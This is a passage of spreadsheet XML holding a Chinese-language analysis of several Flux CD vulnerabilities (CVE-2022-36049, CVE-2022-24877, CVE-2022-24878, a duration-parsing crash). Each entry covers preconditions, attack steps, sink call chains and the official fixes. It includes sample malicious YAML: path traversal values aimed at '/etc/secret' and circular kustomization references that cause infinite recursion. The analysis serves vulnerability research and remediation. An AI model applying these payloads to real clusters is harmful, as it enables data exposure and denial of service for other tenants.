    <t>https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v</t>
  </si>
  <si>
    <t>前提条件：
- 对 Flux 资源有修改权限（CREATE/UPDATE）
- 目标运行受影响版本的 Flux controllers
- 能够修改 .spec.interval 或 .spec.timeout 字段</t>
  </si>
  <si>
    <t>步骤1：创建/修改 Flux 资源
apiVersion: source.toolkit.fluxcd.io/v1beta2
kind: GitRepository  # 或其他 Flux 资源
metadata:
  name: exploit-repo
spec:
  # 注入无效的时间值
  interval: "invalid-duration"  # 注入点
  # 或
  timeout: "malformed-time"    # 注入点
步骤2：提交资源
kubectl apply -f exploit.yaml
步骤3：触发漏洞
- 控制器尝试处理无效的时间值
- 类型转换失败
- 导致对象处理停止
---
问题流程：
a) CRD 定义：声明使用 time.ParseDuration
b) API 服务器：实际使用 strfmt.ParseDuration
c) 反序列化：使用 time.ParseDuration
导致：
- API 服务器接受 'd' 和 'w' 单位
- 但反序列化时无法处理这些单位</t>
  </si>
  <si>
    <t>组件崩溃导致服务无法正常提供</t>
  </si>
  <si>
    <t>特定组件影响（处理相关资源的控制器）</t>
  </si>
  <si>
    <t xml:space="preserve"> a Flux source 
# 通过修改 Flux 资源的时间相关字段
apiVersion: source.toolkit.fluxcd.io/v1beta2
kind: GitRepository  # 或其他 Flux 资源
spec:
  interval: "invalid-value"    # 注入点1
  timeout: "malformed-time"    # 注入点2
注入资源有5个：
通过修补补丁确认： https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a#diff-f93336ce43d9a04045c2b808ffbeb95a8d9bf0c880f94494e2dbf7ee669e2755</t>
  </si>
  <si>
    <t>或</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">metav1.Duration 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>type Duration struct {
 time.Duration `protobuf:"varint,1,opt,name=duration,casttype=time.Duration"`
}</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>CRD资源</t>
  </si>
  <si>
    <t>是（ 内部存在多个字段）</t>
  </si>
  <si>
    <t>资源都存在该特定基础功能的字段</t>
  </si>
  <si>
    <t>代码注释： 存在代码注释，但缺少安全性说明
文档：无
验证逻辑： 存在特定的验证函数ime.ParseDuration
错误信息提示:不存在错误信息
单元测试文件中进行测试：存在功能性测试</t>
  </si>
  <si>
    <t>时间间隔设置</t>
  </si>
  <si>
    <t>格式化后进行赋值</t>
  </si>
  <si>
    <t>系统配置解析</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Duration 类型不兼容导致的问题：
  Kubernetes metav1.Duration &lt;-&gt; Go time.Duration
影响控制器的配置（时间间隔配置）
// 可能的 sink 点位置：
// 1. Duration 解析处理
func parseDuration(d metav1.Duration) (time.Duration, error) {
    // 这里尝试将 metav1.Duration 转换为 time.Duration
}
// 2. 控制器的 Reconcile 循环
func (r *Reconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    // 读取和处理时间字段
    if err := r.Get(ctx, req.NamespacedName, &amp;resource); err != nil {
        return ctrl.Result{}, err
    }
    // 使用 interval/timeout 值
}
// 3. 定时器/计时器设置
func setReconcileTimer(interval metav1.Duration) {
    // 设置调谐间隔
}
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>解析函数：不同阶段使用不同的解析函数缺乏统一的处理标准
api-server 的序列化和 controller 的反序列化函数存在差异</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>资源解析流程</t>
  </si>
  <si>
    <t xml:space="preserve">入口： 标准化的解析字段过程-&gt; 在反序列化接口中被调用
</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>调用深度：1</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
UnmarshalJSON -》 time.ParseDuration(str)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">准入控制插件
api-server( # 在 CRD 定义中添加正则表达式模式验证）
</t>
  </si>
  <si>
    <t xml:space="preserve">使用准入控制器限制值：
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: flux-validator
webhooks:
  - name: validate-duration.flux.io
    rules:
      - apiGroups: ["source.toolkit.fluxcd.io"]
        apiVersions: ["v1beta2"]
        operations: ["CREATE", "UPDATE"]
        resources: ["*"]
----
加check
</t>
  </si>
  <si>
    <t>CRD 配置文件添加正则表达式Pattern -&gt; API-server 端校验</t>
  </si>
  <si>
    <t xml:space="preserve">验证逻辑增加：
crd 格式校验
</t>
  </si>
  <si>
    <t>CVE-2022-36049</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>oss fuzzer 发现的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- Helm SDK 中的内存消耗问题
- 特定输入可导致内存耗尽
- 可能导致控制器崩溃
- 影响所有 HelmRelease 的处理
相关
与CVE-2022-36055 相关
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">动态测试
fuzz
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=44996
https://issues.oss-fuzz.com/issues/42512596
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Flux2 is a tool for keeping Kubernetes clusters in sync with sources of configuration, and Flux's helm-controller is a Kubernetes operator that allows one to declaratively manage Helm chart releases. Helm controller is tightly integrated with the Helm SDK. A vulnerability found in the Helm SDK that affects flux2 v0.0.17 until v0.32.0 and helm-controller v0.0.4 until v0.23.0</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> allows for specific data inputs to cause high memory consumption. In some platforms, this could cause the controller to panic and stop processing reconciliations. In a </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>shared cluster multi-tenancy environment, a tenant could create a</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> HelmRelease</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> that makes the controller panic, denying all other tenants from their Helm releases being reconciled. Patches are available in flux2 v0.32.0 and helm-controller v0.23.0.</t>
    </r>
  </si>
  <si>
    <t>Package
 github.com/fluxcd/flux2 (
Go
)
Affected versions
&lt; v0.32.0 &gt;= v0.0.17
Patched versions
v0.32.0
 github.com/fluxcd/helm-controller (
Go
)
&lt; v0.23.0 &gt;= v0.0.4
v0.23.0</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">https://github.com/fluxcd/helm-controller/compare/v0.22.2...v0.23.0
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Enable RecoverPanic option on reconciler ：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
https://github.com/fluxcd/helm-controller/pull/516（添加崩溃后恢复的机制）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Add validation to TargetPath and ValuesKey：https://github.com/fluxcd/helm-controller/pull/520（在crd中添加字段格式限制：Add validation to TargetPath and ValuesKey）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3</t>
  </si>
  <si>
    <t>需要权限：
- 能创建或修改 HelmRelease 资源
- 在多租户集群环境中
环境要求：
- 共享的多租户集群
- 运行受影响版本的 Helm Controller</t>
  </si>
  <si>
    <t>步骤 1：准备恶意配置
- 创建包含特定数据的 HelmRelease
- 数据结构设计触发 Helm SDK 的内存问题
步骤 2：提交 HelmRelease
kubectl apply -f malicious-helmrelease.yaml
步骤 3：等待触发
- Helm Controller 处理该 HelmRelease
- 调用 Helm SDK 处理数据
- 触发内存耗尽
- 控制器崩溃
步骤 4：影响确认
- 控制器停止工作
- 其他租户的 Helm Release 无法处理</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">HelmRelease
# 创建恶意的 HelmRelease
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: malicious-release
spec:
  # 包含可触发内存问题的特定数据
  # 利用 Helm SDK 的漏洞
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>根据补丁推理出：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
---
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: malicious-release
spec:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  # 潜在注入点 1
  valuesKey: "大量数据或特殊字符..."
  # 潜在注入点 2  
  path: "大量数据或特殊字符</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>..."</t>
    </r>
  </si>
  <si>
    <t>是（单资源多字段）</t>
  </si>
  <si>
    <t>无文档、无注释</t>
  </si>
  <si>
    <t>引用资源字段</t>
  </si>
  <si>
    <t xml:space="preserve">跨信任域： 应用开发-&gt; 集群运维
</t>
  </si>
  <si>
    <t>系统/服务配置生成</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">组合和合并来自多个来源的 Helm chart 值，
这个函数的主要功能是从多个来源（包括ConfigMaps、Secrets、外部URL等）收集和合并配置值，然后生成用于Helm Chart部署的最终配置。它直接参与了将用户提供的输入转换为系统配置的过程，这正是配置注入类漏洞可能发生的地方。
在helm-controller 中:
reconcileRelease-&gt;ChartValuesFromReferences-&gt;
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">   // TODO(hidde): this is a bit of hack, as it mimics the way the option string is passed
    //     to Helm from a CLI perspective. Given the parser is however not publicly accessible
    //     while it contains all logic around parsing the target path, it is a fair trade-off.
    if err := ReplacePathValue(result, ref.TargetPath, string(valuesData)); err != nil {
       return nil, NewErrValuesReference(namespacedName, ref, ErrValueMerge, err)
    }
    continue</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
#TODO 这里没有定位到具体出现问题的helm sdk 的函数位置
相关的函数信息： https://nvd.nist.gov/vuln/detail/cve-2022-36055</t>
    </r>
  </si>
  <si>
    <t>存在跨组件-&gt; 调用helm sdk</t>
  </si>
  <si>
    <t>#TODO 待分析</t>
  </si>
  <si>
    <t>调用深度： 1
reconcileRelease-&gt;// Compose values based from the spec and references.
 values, err := chartutil.ChartValuesFromReferences</t>
  </si>
  <si>
    <t xml:space="preserve">api-server( # 在 CRD 定义中添加正则表达式模式验证）
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">增加check:
# 修复前：
# 缺乏对特定字段的长度和格式限制
# 修复后：
spec:
  properties:
    valuesKey:
      description: "ValuesKey is the data key where the values.yaml or a specific value can be found at"
      # 添加了长度限制
      maxLength: 253
      # 添加了格式验证
      pattern: ^[\-._a-zA-Z0-9]+$
      type: string
    path:
      maxLength: 250
      pattern: ^([a-zA-Z0-9_\-.\\\/]|\[[0-9]{1,5}\])+$
----
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>关键改进：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
a) 字符集限制：
   - 只允许字母数字
   - 允许特殊字符 -._
   - 严格控制输入字符范围
b) 长度限制：
   - valuesKey: 最大 253 字符
   - path: 最大 250 字符
c) 格式验证：
   - 使用正则表达式验证
   - 限制字符组合方式</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-24877</t>
  </si>
  <si>
    <t xml:space="preserve"> - kustomize-controller 处理 kustomization.yaml 时存在文件访问控制缺陷
- 可以读取 Pod 文件系统中的敏感文件
- 在多租户环境下可能导致权限提升</t>
  </si>
  <si>
    <t>The Flux engineering team found and patched this vulnerability.-&gt; 不确定</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Flux is an open and extensible continuous delivery solution f</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>or Kubernetes. Path Traversal in the kustomize-controller via a malicious `kustomization.yaml` allows an attacker to expose sensitive data from the controller’s pod filesystem and possibly privilege escalation in multi-tenancy deployments.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Workarounds include automated tooling in the user's CI/CD pipeline to validate `kustomization.yaml` files conform with specific policies. This vulnerability is fixed in kustomize-controller v0.24.0 and included in flux2 v0.29.0.</t>
    </r>
  </si>
  <si>
    <t>Package
 github.com/fluxcd/flux2 (
Go
)
Affected versions
&lt; v0.29.0
Patched versions
v0.29.0
 github.com/fluxcd/kustomize-controller (
Go
)
&lt; v0.24.0
v0.24.0</t>
  </si>
  <si>
    <t xml:space="preserve"> kustomize-controller v0.24.0 and included in flux2 v0.29.0 released on 2022-04-20
https://github.com/fluxcd/kustomize-controller/pull/620/commits/f4528fb25d611da94e491346bea056d5c5c3611f#diff-5d1fa9b5557ebd96e4511008d93cb5cc21084d81f6baac4d1ebbbfd28a69eba0</t>
  </si>
  <si>
    <t>https://github.com/fluxcd/flux2/security/advisories/GHSA-j77r-2fxf-5jrw</t>
  </si>
  <si>
    <t xml:space="preserve"> - 对 Flux 源仓库有写入权限
- 能够修改 kustomization.yaml
- 目标运行受影响版本的 kustomize-controller</t>
  </si>
  <si>
    <t>恶意 kustomization.yaml
↓
kustomize-controller 处理
↓
访问 Pod 文件系统
↓
读取敏感数据
↓
可能的权限提升</t>
  </si>
  <si>
    <t>信息泄露-&gt; 提权</t>
  </si>
  <si>
    <t>信息泄露
权限提升</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Kustomization
---
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
spec:
  path: "../../../../etc/secret"  # 注入点：利用路径遍历
  # 或
  path: "/etc/secret"            # 注入点：使用绝对路径 # 路径遍历
-&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
api/v1beta2/kustomization_types.go: 
kustomization.Spec.Path</t>
    </r>
  </si>
  <si>
    <t>注释：
文档： 
错误信息：
单元测试</t>
  </si>
  <si>
    <t>容器-&gt; 宿主机</t>
  </si>
  <si>
    <t>文件访问（路径遍历）
os.WriteFile</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">调用深度：3
reconcile-&gt;r.generate-&gt;func (kg *KustomizeGenerator) WriteFile(dirPath string) error-&gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>os.WriteFile</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(kfile, kd, os.ModePerm)
调用深度：4
reconcile-&gt;r.build-&gt;secureBuildKustomization-&gt;k.Run(fs, dirPath)-&gt;ldr, err := fLdr.NewLoader(lr, path, fSys)
创建加载器隐含文件读取操作
这里使用提供的文件系统 fSys 和路径 path 创建了一个加载器，这个加载器会用于后续的文件操作。
后续有2个文件读取操作：
在加载 OpenAPI 规范文件时的显式读取：
if openApiPath, exists := kt.Kustomization().OpenAPI["path"]; exists {
    bytes, err = ldr.Load(filepath.Join(ldr.Root(), openApiPath))
    if err != nil {
        return nil, err
    }
}
kt.load(): kt.Load() 很可能会加载 kustomization.yaml 或相关文件。
m, err = kt.MakeCustomizedResMap(): 隐含文件读取</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">controller
</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>增加check</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
----
官方修复：
- 在 v0.24.0 版本修复
- 实现新的文件系统处理机制
// 修复前：使用普通文件系统
fs := filesys.MakeFsOnDisk()
// 修复后：使用安全的文件系统
fs, err := securefs.MakeFsOnDiskSecure(kg.root)
- 限制文件访问在工作目录内
// 新增工作目录概念
func (r *KustomizationReconciler) generate(
    kustomization kustomizev1.Kustomization,
    workDir string,    // 新增工作目录参数
    dirPath string,
) error
- 阻止对外部文件的引用
临时解决方案：
- 使用 conftest 等工具检查 kustomization.yaml
- 实施文件路径访问策略
- 限制特定路径的访问
---
详细修复方案：
a) 文件系统访问控制：
   - 限制文件操作在工作目录内
   - 禁止访问外部文件
b) 路径验证：
   - 确保所有操作在根目录内
   - 防止路径遍历
c) 安全构建：
   - 使用安全的文件系统实现
   - 增加目录边界检查</t>
    </r>
  </si>
  <si>
    <t>验证逻辑增加：使用更安全的sanitizer</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1 check 点：
func (r *KustomizationReconciler) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>build</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">(-&gt;SecureBuildKustomization
-&gt; fs, err := securefs.MakeFsOnDiskSecure(root)
2. check点：
 WriteFile -&gt; 
func (kg *KustomizeGenerator) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>generateKustomization</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">(dirPath string) error {-》
支配os.writefile -同一函数
check 点和os.writefile（sink点） 在同函数中且直接支配sink点 </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">fs, err := securefs.MakeFsOnDiskSecure(kg.root)-&gt; 自定义sanitizer-&gt; wrapper 函数一层
</t>
  </si>
  <si>
    <t>check点有明显的错误信息输出</t>
  </si>
  <si>
    <t>CVE-2022-24878 （比较特例，不具有通用性模式）</t>
  </si>
  <si>
    <t xml:space="preserve"> - 通过特制的 kustomization.yaml 导致控制器进入死循环
- 影响所有租户的 Kustomization 处理
- 可能导致服务不可用</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Flux is an open and extensible continuous delivery solution for Kubernetes. Path Traversal in the kustomize-controller via</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> a malicious `kustomization.yaml` allows an attacker to cause a Denial of Service at the controller level.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Workarounds include automated tooling in the user's CI/CD pipeline to validate `kustomization.yaml` files conform with specific policies. This vulnerability is fixed in kustomize-controller v0.24.0 and included in flux2 v0.29.0. Users are recommended to upgrade.</t>
    </r>
  </si>
  <si>
    <t>Package
 github.com/fluxcd/flux2 (
Go
)
Affected versions
&lt; v0.29.0 &gt;= v0.19.0
Patched versions
v0.29.0
 github.com/fluxcd/kustomize-controller (
Go
)
&lt; v0.24.0 &gt;= v0.16.0
v0.29.0</t>
  </si>
  <si>
    <t xml:space="preserve">kustomize-controller v0.24.0 and included in flux2 v0.29.0 released on 2022-04-20. 
https://github.com/fluxcd/kustomize-controller/commit/105ebd9f477093a395b7c6ee65e5b998a92b4dfc
</t>
  </si>
  <si>
    <t>https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp</t>
  </si>
  <si>
    <t>必要条件：
- 对 Flux source 有写入权限
- 能够修改 kustomization.yaml
- 目标运行受影响版本的 kustomize-controller</t>
  </si>
  <si>
    <t>恶意 kustomization.yaml
↓
kustomize-controller 处理
↓
进入死循环
↓
服务不可用
↓
影响其他租户</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Kustomization
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>具体的注入的字段应该是
Kustomization.spec.path
攻击者可以通过构造循环引用的 kustomization 文件，在修复前导致控制器无限递归，最终耗尽资源。修复通过跟踪已访问路径来防止这种攻击。</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
---</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
1. 攻击向量构造：
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"># 主 kustomization.yaml
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
spec:
  path: ./base   # 指向含有恶意 kustomization.yaml 的目录
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>2. 恶意的kustomiztion.yaml 文件</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
# ./base/kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../overlay1    # 指向 overlay1 目录
# ./overlay1/kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../base       # 循环引用回 base 目录
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>3. 漏洞触发流程：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
// 1. 控制器处理 CRD，调用 build
func (r *KustomizationReconciler) build(...) {
    // 2. 解密和处理环境文件
    if err = dec.DecryptEnvSources(dirPath); err != nil {
        ...
    }
}
// 3. 递归处理 kustomization 文件
func recurseKustomizationFiles(root, path string, ...) {
    // 4. 加载 kustomization 文件
    kus, err := secureLoadKustomizationFile(root, relPath)
    // 5. 处理资源引用
    for _, res := range kus.Resources {
        // 6. 递归处理引用的资源
        recurseKustomizationFiles(root, res, visit, visited)
    }
}
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>// 修复前没有跟踪已访问的路径
// base -&gt; overlay1 -&gt; base -&gt; overlay1 循环继续</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
---
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>resource: types/kustomization.go中：Kustomization.Resource
types/kustomization.go 中的 Kustomization:
// 这是 Kustomize 工具本身使用的类型定义
type Kustomization struct {
    // 用于描述 kustomization.yaml 文件的内容
    Resources []string                  // 引用的资源
    Generators []string                // 生成器配置
    SecretGenerator []SecretArgs      // Secret 生成器
    // ...其他配置字段
}
api/v1beta2/kustomization_types.go 中的 Kustomization：
// 这是 Flux 的自定义资源(CRD)定义
type Kustomization struct {
    metav1.TypeMeta                    // K8s 类型元数据
    metav1.ObjectMeta                  // K8s 对象元数据
    Spec KustomizationSpec            // Flux 特定的规范
    Status KustomizationStatus        // Flux 特定的状态
}
关系：
第一个是 Kustomize 工具的内部类型
第二个是 Flux 的 CRD，用于管理 Kustomize 资源
Flux 控制器会将 CRD 中的配置转换为 Kustomize 内部类型
Flux Kustomization CRD 
    ↓
Controller 处理
    ↓
转换为 Kustomize 内部类型
    ↓
执行 Kustomize 操作</t>
    </r>
  </si>
  <si>
    <t>特定的配置字段和特定的资源字段需要结合起来使用</t>
  </si>
  <si>
    <t xml:space="preserve">文件访问（路径遍历）
reconcile-&gt; r.build-&gt; decryptDotEnvFiles-&gt; os.ReadFile </t>
  </si>
  <si>
    <t xml:space="preserve">调用深度：3
reconcile-&gt; r.build-&gt; decryptDotEnvFiles-&gt; os.ReadFile </t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>增加check</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
----
官方修复：
- 在 v0.24.0 版本修复
- 实现新的文件系统处理机制
// 修复前：使用普通文件系统
